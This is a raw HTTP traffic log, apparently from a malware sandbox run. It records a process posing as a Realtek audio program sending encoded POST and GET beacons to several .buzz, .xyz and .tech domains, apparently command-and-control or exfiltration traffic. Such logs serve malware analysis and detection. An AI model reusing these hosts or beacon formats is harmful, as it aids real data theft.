                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjg0OWVmMzItOTVkMi00NzE0LWFhNTUtODY0NjAxOWY0MjQyIiwicGFnZV90aW1lIjoxNzM0MDM2ODc2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        8 | 192.168.11.20 | 49723 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:38.999013901 CET | 390 | OUT | GET /emhd/?Sb=Y3wtcJEoAby1p+bk3zYE+S80u8VCADM8sIJ2uwsESb9JsS+UnBQfnVhf+jS3LtVrLL+QWmPwAmdepwRhozi7BsCDIfZRcDeIjksRC4QWquR1OPmKeFcOon4=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:54:39.130281925 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:54:38 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1478
                                                                                        x-request-id: 25f0375b-85f4-41c6-a1d1-587f757e475f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AZ3uLNt9rXbHW0k6PV5JZ5ETb/dISEcST+qM0Nb9IvznlWozOGfpnoLGqsLQNydLCyQPmGdupJhd0hB2GASR2Q==
                                                                                        set-cookie: parking_session=25f0375b-85f4-41c6-a1d1-587f757e475f; expires=Thu, 12 Dec 2024 21:09:39 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AZ3uLNt9rXbHW0k6PV5JZ5ETb/dISEcST+qM0Nb9IvznlWozOGfpnoLGqsLQNydLCyQPmGdupJhd0hB2GASR2Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:54:39.130295038 CET | 878 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjVmMDM3NWItODVmNC00MWM2LWExZDEtNTg3Zjc1N2U0NzVmIiwicGFnZV90aW1lIjoxNzM0MDM2ODc5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        9 | 192.168.11.20 | 49724 | 172.67.131.144 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:44.415591955 CET | 644 | OUT | POST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=aMSFOt46gPEmL33FcwbIy3Vt0Gy472y7TvDFvQJanHZoAwECCrF1WiluoiV7u+kmojXz5uXBsrTsIlUwDmi+2nx3iQ7aO6nXO6gJGDn7xttUbNGP00UDOB0GjRs8JEb2QDwTgPd+2q2Pibq/8X/WsuFEPfW3Q+cMJVbTlA/gvyvdU0Seluuys9NRabrnOyMhrA==
                                                                                        Dec 12, 2024 21:54:44.703825951 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:54:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkjmG8UsPJHwvfHe4uV3DhV4U00Aypw6rZm89zhMAk490g97Ar5zMwCglmW%2BgTUxlS2%2FongBfEddAO3UM0xGS7YM2udV3iGodScaXUqZPaarsvJ1ZIbBOFSOFeqI0bU5qSZ6"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f109c7ffd54458d-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114362&min_rtt=114362&rtt_var=57181&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Dec 12, 2024 21:54:44.703843117 CET | 172 | IN
                                                                                        Dec 12, 2024 21:54:44.703854084 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        10 | 192.168.11.20 | 49725 | 172.67.131.144 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:47.060172081 CET | 664 | OUT | POST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmyJoBUUCDp91fylu9SV+helqojbR5vrBsr3sIlEwDR2533x1pw7EQKnXO6gJGDjBxtFUa+eP1VUCQx0F0hs8eUbyQDwhgNol2o+PiZy/8jrV7+FGMvXOZNNSMn7upjXJ1CvWRifE4caWvuRjerSPMwN62OTmwLZWD7DNWJJTBR6iAZU=
                                                                                        Dec 12, 2024 21:54:47.372967005 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:54:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zGPAKatVayDWW2tuxyE0EaGsDim7WGXINAyc9a47woTnljPaT%2BzxI0XWCqUm5Pzh2j8GqbQN%2FKkAe6cABmUraYefNm1%2BNMlsUp%2BlmgP6qZpX4e%2BITbO3rW7X3j4AdW4azIjP"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f109c907b856779-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114143&min_rtt=114143&rtt_var=57071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Dec 12, 2024 21:54:47.372980118 CET | 168 | IN
                                                                                        Dec 12, 2024 21:54:47.372992039 CET | 20 | IN | Data Raw: 61 0d 0a 03 00 b7 30 52 23 cb 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: a0R#0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        11 | 192.168.11.20 | 49726 | 172.67.131.144 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:49.703917980 CET | 2578 | OUT | POST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:54:49.704006910 CET | 5235 | OUT
                                                                                        Data Ascii: +8FSSFsYRJCSYJous/0dTs3xF26u/HedvnfNxxyDxzGi+ocS+25/jDVnHYQq4FjB1lKCx9dHDmUjFSYCNXWCzlFP6hFSO7yPEzy2eSsz7Pfv6zaWe32YaAqma+BBl41kFyL7yHqwjD70dp/AZlaE5gvAG3Zi8rB/s9Rs0AVh1vzeL0f1lr7dBSQg/pdKEWkyV6cV4HU5Qs/5lvf+DCnx6lTKQt0dqIDTgNKEocau+Xco6xPooKL
                                                                                        Dec 12, 2024 21:54:50.001415014 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:54:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhkTHG0vo2tToDRsDyedsxOKWpjoIDytBbyVL%2B5CGF8Z9inBKqLqzHsVfHJVcki5b1hTU3urTNEGCPOvqwMIdJw2kgLVB4oT7WK8rt0Y%2FezmUG%2Bu1nRdToxAaetPoHPCoD48"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f109ca10fc4b06f-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114244&min_rtt=114244&rtt_var=57122&sent=4&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7813&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Dec 12, 2024 21:54:50.001422882 CET | 175 | IN
                                                                                        Dec 12, 2024 21:54:50.001427889 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        12 | 192.168.11.20 | 49727 | 172.67.131.144 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:54:52.340471029 CET | 382 | OUT | GET /1lpi/?Hsa=KVXAK1dJ22EyzD&Sb=XO6lNaUCtrQGcU2USTPm7AFH+ym41S/sd9ytkxpugSckEiM1CKodZjEVrjBa4PsrlwO68eKRpavYImQlE0qw0gJ/mieYbLr4KLMXJAig3t9gV+Ck/1h1VB8= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:54:52.635255098 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:54:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jL0PyhODxy6Fr61CEDETv2y59VTQ%2Bem1yMLVQ4TI2bz0nTaW7beyGx0ZebIfVRIIZ%2B3ricxGs4EYK6a6eaSEYo2TZf78c6hplFvuNeasVijOKxAVdyBagJiGKBaHQOK4MvoQ"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f109cb17e74135f-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114349&min_rtt=114349&rtt_var=57174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=382&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Ascii: 5cb<script type="text/javascript"> gowechat(); function gowechat() { var ua = navigator.userAgent; var isWeixin = ua.indexOf('MicroMessenger') > -1; // if (isWeixin) {window.location.href = 'https://site.ip138.com/www.jyshe18.buzz'; // } }</script><script type="text/javascript"> goqqllq(); function goqqllq() { var ua = navigator.userAgent; var isqqllq = ua.indexOf('QQBrowser') >
Dec 12, 2024 21:54:52.635380983 CET | 1009 | IN |
                                                                                        Data Ascii: -1; // QQ if (isqqllq) {window.location.href = 'http://site.ip138.com/www.jyshe18.buzz'; // QQ } }</script><script type="text/javascript"> goquark(); function goquark() { var ua = naviga
Dec 12, 2024 21:54:52.635396004 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49728 | 103.106.67.112 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:54:58.019175053 CET | 644 | OUT | POST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=CsiCnhlEY8Al+PEy2AIEH8sWZVYBfBxtkGkuRrIrjcKUNaeVKqa3QlOXty80kSvQDvIPGtT9KZr5JL1YUSc1dQ03inufHWRPZuijJghBcSPIjaAWj9TYwCeuBJH8cMbvDkw5AuLzNO8hNVqIrtXyu4vN7ymZQmcuiS64H2cHyxplZ7gn0lmRlGH85eQFcQ+PWQ==
Dec 12, 2024 21:54:58.180129051 CET | 204 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:54:58 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49729 | 103.106.67.112 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:55:00.712104082 CET | 664 | OUT | POST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=CsiCnhlEY8Alvf0y1hIEQssXFlYBGRxpkGguRqM7kqaUN/iVLvu3cFOX5i8x7ivPDvFsGsv9KZX5JLlYUlIycA018HuBN2RPZuijJg17cR/Iku8WjcTbzCetRZH8K8bzDkxUAvnJNMEhNUaIr4jxl4vLminMe3N6rhW1LGYjtD5vVNt9pXS1mVbO9upteS/ULR8ZPf27ktSMVh0JKcv34Zg=
Dec 12, 2024 21:55:00.871450901 CET | 204 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:55:00 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49730 | 103.106.67.112 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:55:03.399182081 CET | 2578 | OUT | POST /86f0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        Origin: http://www.furrcali.xyz
                                                                                        Referer: http://www.furrcali.xyz/86f0/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Data Ascii: Sb= [TRUNCATED]
Dec 12, 2024 21:55:03.399267912 CET | 5235 | OUT |
                                                                                        Data Ascii: gioCkw7bvFvm1q7j2/8ygIMRHuzUT4/E2jOqgMEw87rwjBx3S8e7CDCYMU+YUWgC7RLSZQlcmUOVhpU7W3sNO0q58k0fVi/sY5JPAUhihaV8rQfFlDE5EvGX3qWRonPIbWzNP3bHLIP8CqzJZ4mI0cqOLknvCF1JpOSNNnqBKkjlpBNUtdFgwN4TKo+1GTUau79SiYmfdUYRV+Ucfyjjn1edHEiES5lGR0E9vzAjFfClD3r/RQ2
Dec 12, 2024 21:55:03.559663057 CET | 204 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:55:03 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49731 | 103.106.67.112 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:55:06.087656975 CET | 382 | OUT | GET /86f0/?Sb=PuKikXorY4oo6Pd4yxwUW5NofTFUIXhFjDlOX4M2s/L5J9SfDLPGQlnn7RwJ6yyFAuMFatCqAdXGLq9bXHIsbHEK0zn8CXVXTea1ExwfCjX9qoJAsvLL/QI=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.furrcali.xyz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Dec 12, 2024 21:55:06.248677969 CET | 204 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Thu, 12 Dec 2024 20:55:06 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49732 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:55:11.547008991 CET | 656 | OUT | POST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=dTFvZ2VPnYiRoXcwxVCakJsiseYWGGk/p32CxtqxUe30VYBl9csu9rFPYrwfL7FJL091zQ4jjL6oxEX6qk1jgit9QjY3bBj7lVVli/8TwjdDWwh/MKdVfgNjAaMk8EV5RhfcbfSzbgauvWnakg9HMq1s1QSmqoqt+v8X8r/N0C14hhkYSeDFhaClsl4bf89SoQ==
Dec 12, 2024 21:55:11.677968979 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:10 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: e855e1e9-c412-4730-885d-b63f614aa460
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=e855e1e9-c412-4730-885d-b63f614aa460; expires=Thu, 12 Dec 2024 21:10:11 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Dec 12, 2024 21:55:11.677985907 CET | 534 | IN |
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTg1NWUxZTktYzQxMi00NzMwLTg4NWQtYjYzZjYxNGFhNDYwIiwicGFnZV90aW1lIjoxNzM0MDM2OTExLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49733 | 199.59.243.227 | 80 | 7500 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:55:14.195770979 CET | 676 | OUT | POST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=dTFvZ2VPnYiRq3Mw3yea1Zslj+YWMmk7p36CxpybUsD0W8Fl8dsu07FPQLwgP7FeL0gKzTgjjLuoxBr6qS9gmytjJzY1Uhj7lVVli7U1wjFDWBR/MrdWSANgHaMkrUV1RhembeeVbmWuvTjakVREGq1m4wTNj6ak4cNqzqLBwABbpXpCPs3hiJeXoVBzd+8J1R4ZIZfD0a2emFjI8TITT24=
Dec 12, 2024 21:55:14.327230930 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:13 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: c259870e-9aca-4097-bf9f-f7fedc26a230
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=c259870e-9aca-4097-bf9f-f7fedc26a230; expires=Thu, 12 Dec 2024 21:10:14 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:14.327280045 CET | 534 | IN
